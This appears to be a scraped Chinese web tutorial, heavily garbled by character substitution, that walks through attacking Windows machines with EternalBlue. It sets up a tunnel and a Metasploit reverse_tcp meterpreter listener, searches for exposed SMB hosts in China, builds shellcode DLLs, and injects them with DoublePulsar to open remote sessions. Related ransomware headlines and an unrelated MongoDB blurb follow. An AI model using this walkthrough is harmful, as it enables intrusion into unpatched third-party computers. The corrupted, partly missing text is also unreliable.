TCP 地道
这一步须要你有公网 IP,如不雅你没有的话可以用 TCP 地道办事来代替……比如各类基于 Ngrok 的地道办事……
这里我就不教程了……你们本身弄好就行
我如今假设你们地道办事商 IP 是 123.123.123.123,给你的端口是 8888,你本地的端口也开 8888,下面一步操作的时刻记得把这些数字换成真实的。
提示
如不雅你是扫描校内网,并且校内网没有对机械互联端口做限制的话,不消 TCP 地道也是可以的,那你就把下面教程里的所有 LHOST 填你本身的网卡 IP 即可。
MSF 监听反弹端口
在 MSF 里,应用 multi/handler。
如不雅你要进击的机械是 32 位的机械:
搜刮框右边的选项选主机,输入 service:microsoft-ds os:windows country:china Enter 搜刮。
set payload windows/meterpreter/reverse_tcp
如不雅是 64 位的:
set payload windows/x64/meterpreter/reverse_tcp
然后
DONE
LHOST 就填 127.0.0.1 就可以,因为膳绫擎我们用了地道。
最后一个 -j 是将 exploit 放在后台运行,临时可以不消管了。
你可以经由过程 jobs -l 看到所有后台义务。
生成 Shellcode DLL
在 MSF 里履行
膳绫擎的 {Payload} 换成你上个阶段用的 payload,然后 HOST 和 PORT 也要记得换,{ARCH} 如不雅是 32 位就写 x8664 位就写 x64。
你也可以分别生成两个 DLL 备用,反正以落后击到的 32 位 64 位都有可能。
然后把这两个 DLL 复制到 ~/.wine/drive_c 目次下
双倍脉冲(Doublepulsar)注入
切换到 Wine CMD 里的 FB 平台,应用 Doublepulsar
然后就按照提示一路 Enter,Proto 选 SMB,x86 照样 x64 根据目标机械选。
这一步选 2,RunDLL。
DLL 位制揭捉?根据你的文件名填,比如 C:\x86.dll 或者 C:\x64.dll,然后持续 Enter。
OSX
当你看到这个 Success 的时刻,表示注入成功。
如今切回你的 MSF 看看是不是有些 sending stage 之类的输出。
如不雅没有的话就把 DLL 的生成检查一遍看看参数有没有写对,然后再履行一遍上一步。
如不雅有输出的就输入 sessions -l 查看已经连接好的 meterpreter。
然后用 sessions -i <ID> 连上去:
OK 了!后面的我就不教了,你可以输入 help 然后 Tab 看看竽暌剐哪些敕令。然后 <command> -h 获取赞助。
然后 https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/ 这里有一些根本的后渗入渗出敕令的解释。
【编辑推荐】
- 梭子鱼收集:为什么Locky勒索病毒异常危险?
- 当心!勒索病毒DXXD 2.0版来袭,黑客称只能缴纳赎金无法破解
- 亚信安然宣布防备WannaCry/Wcry蠕虫勒索病毒紧急公告!
- 应对“勒索病毒”周一开机操作指南
- 专家猜测第二波WannaCry勒索病毒进击即将到来!
推荐阅读
MongoDB是一个基于分布式文件存储的数据库,应用C++说话编写。旨在为Web应用供给可扩大的高机能数据存储解决筹划。应用机能高低依附于数据库机能,MongoDB则长短关系数据库中功能最丰富,最像关系数据库的,跟着Mong>>>详细阅读
本文标题:手把手教你用永恒之蓝(Eternalblue)勒索病毒漏洞的高阶用法
地址:http://www.17bianji.com/lsqh/35262.html
1/2 1